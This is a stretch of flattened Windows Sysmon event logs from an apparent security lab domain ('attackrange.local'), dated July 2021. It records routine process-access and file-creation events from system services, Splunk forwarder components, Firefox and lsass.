08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8F1-60EB-F379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F1-60EB-F379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.639{0C1E0330-F8F1-60EB-F379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
23542300x8000000000000000810832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.607{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09B97D8F040BF3C45149727E6A99DAFE,SHA256=FFB0DA4F1BF2F4EB4F09E7B954DA073DE90929827F8C3BC11BD0A14215064800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:25.239{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=40228A74B32178CA26832C2171767ABE,SHA256=781DEE5D30D62E5DA66ED8D13A6CC32810C0C6EDA578794D8E9660A53903DADF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:25.086{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA962786A8D096F56034929E78866B6A,SHA256=640AEC52CBABEFF356394A699A5A823CC9456712D8697D05E9D3FD055DDB85DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.279{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF384C1F253C934175EDE2457607C89E,SHA256=99FF886ACA90F77B3D48C00E1FA70724D91D8A14CC41EC11ABF716C8AA53ACD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F2-60EB-F579-00000000D001}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:26.935{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8F2-60EB-F579-00000000D001}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F2-60EB-F579-00000000D001}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.923{0C1E0330-F8F2-60EB-F579-00000000D001}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.920{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28EE5A0B424DF2B69549C71A295C3833,SHA256=08A9DCCB5B9AD8172826BA952F6A0C5B4F7C4147F20EC090F612DF107A75C3DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.920{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1EAC6A0C728A13891793A0A5D129A80,SHA256=FAB168DB9C118CA52F25C5B98BF974C6E9157CE2C746306D97B88E8DF473B09E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:26.957{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 